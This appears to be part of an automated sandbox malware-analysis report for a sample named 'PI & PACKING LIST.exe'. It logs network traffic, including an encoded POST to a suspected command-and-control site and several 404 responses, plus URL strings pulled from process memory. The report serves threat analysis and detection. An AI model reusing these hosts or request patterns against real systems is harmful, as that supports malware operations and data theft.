Source: global traffic HTTP traffic detected: POST /m5oe/ HTTP/1.1Host: www.nu2uresale.storeConnection: closeContent-Length: 5335Cache-Control: no-cacheOrigin: http://www.nu2uresale.storeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.nu2uresale.store/m5oe/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 34 38 78 49 3d 5a 5f 57 38 68 71 47 6b 71 72 46 4f 62 6b 32 6e 79 72 79 63 61 35 4e 4c 51 7a 37 67 72 55 6a 69 56 70 44 48 6c 34 35 47 7e 6b 79 66 50 72 4c 79 4c 34 65 6c 5a 66 62 55 73 58 65 67 51 63 69 72 6b 56 4c 55 69 6b 47 63 53 6e 35 6c 56 69 63 32 31 4d 67 49 78 78 66 30 37 67 67 70 4d 6d 6f 5a 44 37 70 5a 74 62 59 4e 37 33 63 6f 31 45 77 74 63 2d 28 58 5a 47 75 6d 65 62 4f 34 44 65 28 35 4d 2d 33 70 35 5a 41 30 44 65 49 65 39 42 31 78 78 57 4a 6b 4f 64 69 66 43 67 6d 61 4b 63 33 67 44 47 53 7a 77 44 38 47 46 45 61 5a 78 47 30 48 63 4f 64 71 62 57 4a 58 68 75 65 34 7e 66 66 61 30 74 33 70 78 4a 59 7a 61 67 64 47 43 39 4e 2d 41 4a 78 71 54 39 59 39 72 63 4e 45 65 6b 6c 70 73 58 64 41 56 76 53 4b 4c 5a 4c 38 41 5f 69 61 45 69 6f 6a 4d 45 49 68 52 55 71 61 32 79 73 77 72 6f 76 37 7a 49 6f 5a 39 31 49 6f 31 77 48 41 46 41 66 44 6e 6e 6f 35 58 7a 45 71 43 44 65 2d 37 65 42 4b 78 70 73 61 55 42 76 76 55 76 7a 66 71 65 71 45 6a 48 62 62 4c 4e 65 6c 55 34 79 66 49 54 64 48 58 74 42 4c 34 32 61 71 47 71 52 72 33 30 6f 55 61 63 67 6c 67 47 42 65 56 33 45 35 58 47 53 58 64 38 74 44 61 69 79 48 33 59 61 53 59 42 39 65 34 33 77 47 79 45 4a 33 52 50 6b 51 73 63 62 62 71 72 32 67 31 77 64 7a 33 46 7a 54 4e 53 64 73 70 69 34 34 65 79 70 6d 53 4a 31 33 4d 34 71 2d 48 43 77 52 4d 49 54 76 54 53 61 77 42 30 4b 54 31 52 46 46 4d 4c 66 5f 39 6e 4e 38 32 6d 4d 68 73 6b 4e 35 6f 32 55 4f 5a 56 65 7a 71 4c 39 70 56 49 48 6e 4f 74 65 38 53 38 6c 79 61 6b 38 44 50 57 61 4f 32 53 4b 6b 35 73 34 34 67 4f 52 6d 4e 43 79 5a 63 49 61 43 62 45 49 70 78 4d 71 49 6e 34 52 32 7e 4b 6c 64 74 63 7a 4e 52 75 70 6f 37 66 42 4e 43 4d 72 44 6d 71 42 53 6b 6c 71 56 50 4f 31 59 68 38 34 73 58 74 6a 32 58 47 28 71 33 74 36 41 6a 63 77 79 72 54 45 4f 44 64 6e 34 6e 65 72 5a 45 2d 4c 39 44 63 35 71 78 45 6c 34 43 2d 43 44 4a 43 33 76 57 6a 6b 4d 7a 64 64 30 35 34 6a 68 6a 79 30 76 42 6b 78 77 74 63 71 57 35 42 79 65 4c 4e 6a 51 30 44 55 68 6c 6b 57 56 74 64 4f 68 43 30 31 32 4b 55 54 78 4c 6f 44 46 32 6f 39 4e 79 57 49 56 39 61 5a 37 31 4b 5a 61 6b 31 45 64 34 32 32 61 31 6e 38 48 7a 65 34 4d 33 5f 56 48 73 36 39 62 63 67 53 73 6c 79 56 6b 67 4b 63 49 61 31 43 59 73 36 54 36 54 61 6c 4f 66 51 49 67 67 30 65 35 4d 69 49 62 52 44 59 79 79 6a 6d 37 45 74 72 70 6c 31 35 46 42 54 4c 5f 74 58 52 49 6d 71 78 6e 4d 57 49 32 67 73 70 4a 57 52 79 36 34 56 34 7a 69 48 61 58 56 71 54 56 54 43 4b 39 28 61 74 62 63 68 4e 4b 51 65 72 38 75 58 52 64 6f 34 34 6d 42 50 6f 34 5a 79 34 57 70 33 6b 2d 36 48 71 46 43 74 32 46 6a 46 56 64 41 55 43 67 47 74 31 5a 6a 52 66 38 42 4a 46 53 67 46 42 48 7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:30 GMTContent-Type: text/htmlContent-Length: 1277Connection: closeETag: "6373c172-4fd"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 34 30 34 2e 68 74 6d 6c 20 2d 20 41 4d 48 20 5b 4c 4e 4d 50 5d 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c e5 ae 8b e4 bd 93 3b 0d 0a 09 6d 61 72 67 69 6e 3a 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 09 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 6e 6f 6e 65 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 37 30 70 78 20 30 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 23 34 46 36 46 37 44 3b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 36 46 36 46 36 3b 0d 0a 7d 0d 0a 68 31 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 38 37 41 30 41 37 3b 0d 0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 30 70 78 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 7d 0d 0a 61 20 7b 0d 0a 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0d 0a 09 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 20 0d 0a 09 63 6f 6c 6f 72 3a 23 37 36 39 38 41 37 3b 0d 0a 09 62 6c 72 3a 65 78 70 72 65 73 73 69 6f 6e 28 74 68 69 73 2e 6f 6e 46 6f 63 75 73 3d 74 68 69 73 2e 62 6c 75 72 28 29 29 3b 0d 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 70 72 65 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 0d 0a 09 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 0d 0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 35 25 3b 0d 0a 09 77 69 64 74 68 3a 38 32 25 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 32 70 78 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c e5 ae 8b e4 bd 93 3b 0d 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 39 70 78 20 73 6f 6c 69 64 20 23 45 37 45 46 46 31 3b 0d 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 31 70 78 20 30 70 78 20 35 70 78 20 72 67 62 61 28 31 30 30 2c 20 31 30 30 2c 20 31 30 30 2c 20 30 2e 33 29 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 0d 0a 09 5f 66 6f 6e 74 2d 73 69 7a 65 3a 39 70 78 3b 0d 0a 09 6d 61 72 67 69 6e 3a 32 30 70 78 20 35 25 3b 0d 0a 09 77 69 64 74 68 3a 38 32 25 3b 0d 0a 09 63 6f 6c 6f 72 3a 23 39 31 39 31 39 31 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 42 4f 44 59 3e 0d 0a 0d 0a 3c 70 72 65 3e 0d 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 34 30 34 2e 68 74 6d 6c 3c 2f 68 31 3e 0d 0a e6 82 a8 e6 89 80 e8 ae bf e9 97
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:56:36 GMTServer: Apache/2.4.38 (Debian)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:56:38 GMTServer: Apache/2.4.38 (Debian)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 00:56:40 GMTServer: Apache/2.4.38 (Debian)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 70 69 74 68 65 72 61 70 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at www.cpitherapy.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: W/"afe-5db9230fabf0d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: W/"afe-5db9230fabf0d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Nov 2022 00:56:51 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Fri, 01 Apr 2022 06:50:17 GMTETag: "afe-5db9230fabf0d"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://35.78.89.117
Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://amh.sh
Source: control.exe, 0000000D.00000002.517236136.0000000005748000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://amh.sh/
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.292294807.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.323770993.000000000F270000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: PI & PACKING LIST.exe, 00000000.00000002.277482683.00000000065C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
